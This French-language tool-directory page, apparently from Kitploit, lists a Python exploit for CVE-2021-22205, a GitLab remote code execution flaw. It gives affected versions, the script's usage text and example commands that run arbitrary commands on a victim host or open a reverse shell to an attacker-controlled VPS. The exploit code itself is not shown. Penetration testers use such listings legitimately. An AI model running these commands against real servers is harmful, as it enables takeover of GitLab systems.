Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-22205 — Script d'exploitation Python pour CVE-2021-22205 (GitLab RCE) avec des capacités d'exécution de commandes et de shell inversé. Permet un getshell en un clic pour les tests de pénétration. | Kitploit
Outils/GitHubGitHub/keven1z/cve-2021-22205
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubkeven1z/cve-2021-22205

CVE-2021-22205

Script d'exploitation Python pour CVE-2021-22205 (GitLab RCE) avec des capacités d'exécution de commandes et de shell inversé. Permet un getshell en un clic pour les tests de pénétration.

Voir le dépôt
1231il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-22205

En raison d'une validation incorrecte des fichiers image transmis à l'analyseur de fichiers par Gitlab, une exécution de commandes est possible. Un attaquant peut construire une requête malveillante pour exécuter des commandes arbitraires sur le système cible, ce qui conduit finalement au contrôle du serveur Gitlab. Comme la plupart des scripts disponibles en ligne ne proposent pas de reverse shell, j'ai modifié le script existant pour ajouter une fonctionnalité de reverse shell en une seule commande.

Versions affectées

  • 11.9 <= GitLab (CE/EE) < 13.8.8
  • 13.9 <= GitLab (CE/EE) < 13.9.6
  • 13.10 <= GitLab (CE/EE) < 13.10.3

Utilisation

root@kitploit:~
	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
 	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
    	
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
                         [-p PORT]

GitLab < 13.10.3 RCE

optional arguments:
  -h, --help            affiche ce message d'aide et quitte
  -t TARGET, --target TARGET
                        URL cible
  -c COMMAND, --command COMMAND
                        Commande à exécuter
  --shell               Reverse shell (oui/non)
  -i IP, --ip IP        Adresse IP pour le reverse shell
  -p PORT, --port PORT  Port pour le reverse shell

Exemple

root@kitploit:~
python3 CVE-2021-22205.py -t [IP de la victime] --shell -i [IP du VPS] -p [port du VPS] // reverse shell
python3 CVE-2021-22205.py -t [IP de la victime] -c [commande] // exécution de commande

Déclaration

Ce script est destiné à des fins de test uniquement, ne l'utilisez pas à d'autres fins.

Télécharger l’outil